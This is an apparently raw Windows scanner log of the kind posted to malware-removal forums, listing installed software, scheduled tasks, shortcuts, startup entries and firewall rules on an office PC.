64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden 6500_E709_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 6500_E709_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 6500_E709a (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden 7-Zip 16.02 (HKLM-x32\...\7-Zip) (Version: 16.02 - Igor Pavlov) Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.6 - Adobe Systems) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated) Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Reader X (10.1.9) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.9 - Adobe Systems Incorporated) Apple Application Support (32-bit) (HKLM-x32\...\{D4B07658-F443-4445-A261-E643996E139D}) (Version: 4.3.2 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{A6B0442B-E159-444B-B49D-6B9AC531EAE3}) (Version: 4.3.2 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.) Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.) Backblaze (HKLM-x32\...\Backblaze) (Version: - Backblaze, Inc) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) 
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden CASIO C781 USB Driver V1.0.4.0 (HKLM-x32\...\{3FA1785D-EED5-4840-A78F-2FC8B663CA86}) (Version: 1.0.4.0 - CASIO) Citrix Online Launcher (HKLM-x32\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix) CrystalDiskInfo 7.0.4 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.0.4 - Crystal Dew World) CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.) CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden DESI Labeling System (HKLM-x32\...\DESI Labeling System 3.8.1.0) (Version: 3.1.10.1 - DESI Telephone Labels, Inc.) DESI Labeling System (Version: 3.8.1.0 - DESI Telephone Labels, Inc.) Hidden Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden DeviceDiscovery (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden DocMgr (x32 Version: 140.0.65.000 - Hewlett-Packard) Hidden DocProc (x32 Version: 140.0.100.000 - Hewlett-Packard) Hidden Fax (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.49 - FileZilla Project) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 10.0.8.0 - FlashPeak Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.75 - Google Inc.) Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.) 
GoToAssist Customer 2.5.0.888 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.5.0.888 - Citrix Online) GPBaseService2 (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden Hewlett-Packard ACLM.NET v1.1.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Deskjet 2540 series Basic Device Software (HKLM\...\{BD1EFE20-246B-451F-B900-F1214324DF5F}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.) HP Deskjet 2540 series Help (HKLM-x32\...\{4539575D-C09D-4E71-B207-0F2D6BD74DA2}) (Version: 30.0.0 - Hewlett Packard) HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Officejet 6500 E709 Series (HKLM\...\{58D79E62-CFC8-4331-8469-3A1B16E1769C}) (Version: 14.0 - HP) HP Officejet Pro 8610 Basic Device Software (HKLM\...\{39DA3F40-0B9E-4002-8E01-108FEC9EFE43}) (Version: 32.3.198.49673 - Hewlett-Packard Co.) HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.12992 - HP) HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP) HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden HPProductAssistant (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP) iCloud (HKLM\...\{724A887F-2B55-4306-B6F9-8F0E7A04B1B5}) (Version: 5.2.2.87 - Apple Inc.) 
Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2869 - Intel Corporation) iTunes (HKLM\...\{955524E7-79EB-4CA9-BA4D-FD2DF587651B}) (Version: 12.4.3.1 - Apple Inc.) join.me (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\JoinMe) (Version: 1.9.1.204 - LogMeIn, Inc.) Logitech Unifying Software 1.00 (HKLM\...\Logitech Unifying) (Version: 1.00.127 - Logitech) LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) MarketResearch (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft IntelliType Pro 8.2 (HKLM\...\Microsoft IntelliType Pro 8.2) (Version: 8.20.469.0 - Microsoft Corporation) Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - 
x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MS Word Employment Application Template Software (HKLM-x32\...\MS Word Employment Application Template Software_is1) (Version: - Sobolsoft) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden Network64 (Version: 140.0.221.000 - Hewlett-Packard) Hidden OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software) Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden Print Tracker (HKLM-x32\...\Print Tracker_is1) (Version: - Really Impressive Products, LLC) Product Improvement Study for HP Deskjet 2540 series (HKLM\...\{2302D958-4F1E-469A-8A90-15C321320C71}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.) Product Improvement Study for HP Officejet Pro 8610 (HKLM\...\{D2064264-3162-4DB1-AFE0-167BEFBBCD9C}) (Version: 32.3.198.49673 - Hewlett-Packard Co.) 
ProductContext (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5841 - Realtek Semiconductor Corp.) Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version: - Roadkil.Net) Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) SmartWebPrinting (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden Smilebox (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Smilebox) (Version: - ) SolutionCenter (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden Status (x32 Version: 140.0.256.000 - Hewlett-Packard) Hidden Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation) The Print Shop 2.0 Professional (HKLM-x32\...\{159E3ACF-7D79-49A1-A085-9F53B0738C65}) (Version: 2.00.0000 - Encore) The Print Shop 3.0 Deluxe (HKLM-x32\...\{A5154F2B-09F9-40A3-8CA5-B581CA9766C5}) (Version: 1.00.0000 - Encore Software, Inc.) 
The Print Shop 3.0 Fonts (HKLM-x32\...\{2C3060F6-F0DC-4F63-A70F-2070BE57EEDC}) (Version: 1.0 - Encore) The Print Shop 3.5 Fonts (HKLM-x32\...\{B6D7C4E3-27FB-4937-B1F3-9B26C5D2A65A}) (Version: 1.0 - Encore) The Print Shop 3.5 Professional (HKLM-x32\...\{54BBB71F-59C7-4F1B-B08A-7908D4ED3A2B}) (Version: 1.00.0000 - Encore) Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden TrayApp (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden Trend Micro Worry-Free Business Security Agent (x32 Version: 1.0.0 - Trend Micro Incorporated) Hidden WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation) Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp) Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation) Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation) WordPerfect Office X3 (HKLM-x32\...\_{83FBD495-DDF6-4C8D-92D6-10261DD6F6A3}) (Version: - Corel Corporation) WordPerfect Office X3 (x32 Version: 13.3 - Corel Corporation) Hidden ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) 
CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {245CD879-2842-422F-867B-DA8E3DF4B8EA} - System32\Tasks\HPCustParticipation HP Officejet Pro 8610 => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP) Task: {382A1033-1434-4011-8A0A-528FE84E942A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.) Task: {6AFD2FFF-BB51-4CE5-998A-D02855A23969} - System32\Tasks\{3F506071-F11E-4C0B-96B7-E75E0CE71562} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] () Task: {6F7B3DA7-5C81-42D1-AAD4-E18FCF6E683E} - System32\Tasks\{C8E68830-7E17-4851-AABF-7A4BDB33E408} => pcalua.exe -a "C:\Program Files (x86)\The Weather Channel\The Weather Channel App\TheWeatherChannelCustomUninstall.exe" Task: {76F492E8-4B04-431F-98ED-1B67F05F6858} - System32\Tasks\HPCustParticipation HP Deskjet 2540 series => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPCustPartic.exe [2013-02-08] (Hewlett-Packard Co.) 
Task: {A177D0B5-D3BF-403E-8DA1-24A0048C0F82} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.) Task: {ABE9B009-3F74-4365-BCFA-1E18A1FD5C02} - System32\Tasks\Microsoft_Hardware_Launch_IType_exe => c:\Program Files\Microsoft IntelliType Pro\IType.exe [2011-08-10] (Microsoft Corporation) Task: {BC872F32-F800-4657-A412-6BFD3D112486} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.) Task: {C91051DC-C003-41F3-A158-EFD4AC8C6F0D} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2014-09-15] () Task: {CD181832-44D0-4403-A423-C9A093D3E763} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated) Task: {CF5A98A5-FD07-4166-90D3-F61641768CC1} - System32\Tasks\{6D13831B-383D-46E9-9BCC-BB932C054E2C} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] () (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) 
Shortcut: C:\Users\Reception\AppData\Local\7b8b\d848.lnk -> C:\Users\Reception\AppData\Local\7b8b\0db0.bat () ShortcutWithArgument: C:\Users\Reception\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4242a155fcc27c2b\FlashPeak Slimjet.lnk -> C:\Program Files (x86)\Slimjet\slimjet.exe (FlashPeak Inc.) -> --profile-directory=Default ==================== Loaded Modules (Whitelisted) ============== 2016-07-05 14:23 - 2016-07-05 14:23 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2016-07-05 14:23 - 2016-07-05 14:23 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2016-11-14 07:53 - 2016-11-14 07:53 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe 2006-11-02 19:40 - 2006-11-02 19:40 - 00174656 _____ () C:\Windows\SysWOW64\PSIService.exe 2009-07-13 16:03 - 2009-07-13 20:15 - 00364544 _____ () C:\Windows\SysWOW64\msjetoledb40.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) 
==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2016-10-12 10:10 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Control Panel\Desktop\\Wallpaper -> C:\Users\clayton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\Wallpaper -> C:\Users\Reception\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.0.105 - 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start Pervasive PSQL Workgroup Engine.lnk => C:\Windows\pss\Start Pervasive PSQL Workgroup Engine.lnk.CommonStartup MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe" MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe" MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: FromDocToPDF EPM Support => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65medint.exe" T8EPMSUP.DLL,S MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe MSCONFIG\startupreg: 
IgfxTray => C:\Windows\system32\igfxtray.exe
MSCONFIG\startupreg: itype => "c:\Program Files\Microsoft IntelliType Pro\itype.exe"
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe
MSCONFIG\startupreg: Print Monitor => "C:\Program Files (x86)\Print Tracker\PMonitor.exe" /AsUser
MSCONFIG\startupreg: QuickFinder Scheduler => "C:\Program Files (x86)\WordPerfect Office X3\Programs\QFSCHD130.EXE"
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
MSCONFIG\startupreg: Skytel => C:\Program Files\Realtek\Audio\HDA\Skytel.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{82CC6A84-0F65-47EA-8BE3-F207CA244A2C}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{F8BCDB72-BF90-4CE2-9BF9-1F4B8BB7D292}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{56BBE8D5-557C-483C-A36E-4694A337C99F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{A4AC4264-384E-41D6-AE48-36C847FD9539}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{3127FC7D-4D1B-455D-B7FD-41CABFC6B21C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{FCEEA91D-AE9E-479A-BE17-030E83DE8281}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{4063CEB6-2A45-4A28-AFF2-292C9B3E6DCF}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{2570D9B0-C167-4D49-A8CA-DB43E258CA88}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{BF1156BA-9B51-48C7-B6E0-A68BCFD0641A}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{AB1BA386-08EA-4CB3-9290-169EF3FC7956}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{FC73E6D9-AF81-4BA0-A837-67869A303783}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{86410668-EC09-4E8F-AA57-37BE1A7B9E56}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{CF6F3B7A-5FFE-4857-A35C-5056D09FEB34}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{4C8EF354-5132-43C1-98AA-D5A2B10A5B9F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{2C19E4F3-E543-4376-ABB5-70AA0A2A3178}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{BA01ACB9-72F5-4449-BE99-062BA48EC933}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{E96100CC-BA53-41AA-8CAE-4E9E87F8E1B0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{8BE0A430-C8F8-4B3F-BBAF-4B30FA8F4FC7}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{50745699-4E20-4E3C-832B-1E6A05ED30E7}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{A1CEF5E6-3D62-42F7-B10F-3EE826F69F35}] => C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{CFE82968-778D-404A-8383-E4B132C83C1C}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
FirewallRules: [{FE5A9F0F-64E5-43A5-B74D-4267BA445714}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
FirewallRules: [{792D535E-6928-4608-AB87-7EAC62FCFAD9}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetup.exe
FirewallRules: [{DF705928-FDE8-4C27-93B5-159AA18EE903}] => LPort=5357
FirewallRules: [{8036A550-984E-4D16-A1BA-56A200E03D1A}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{EC49BD0F-52D9-4B49-9730-1B4F69FE6296}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe
FirewallRules: [UDP Query User{91FAA043-EAF2-48B8-A853-F19E71692E51}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe
FirewallRules: [{5010814D-4D26-4D7F-8B80-2D90CF068D4D}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{E54FEB7B-9565-41DA-85DC-E1FD68D6247E}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{B9D0A4E9-E6F9-4146-8B03-67C75D8B4F51}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{7F3D2F9D-D014-4F5A-8CBA-3FBD39FD23D8}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{44ECC4F7-DA04-49D9-854A-01A39B01C141}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{DA3C61ED-20F4-4287-B397-8CA879900055}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{077B6AE8-63F5-4122-A822-4D12160FAA23}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FC758905-E8A3-431E-A498-DD8694753456}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{22F46C83-35C6-4AA0-B038-180F477DCBFE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\FaxApplications.exe
FirewallRules: [{11096C12-C565-4CE1-B681-C4F76663EF49}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\DigitalWizards.exe
FirewallRules: [{5204B832-817F-4173-9CE2-0D69EBBDC6AE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\SendAFax.exe
FirewallRules: [{44E5427D-1340-4119-B492-CBED58B9C1F1}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\DeviceSetup.exe
FirewallRules: [{129E950C-8BB0-420D-85EA-7208EF2C3D43}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe
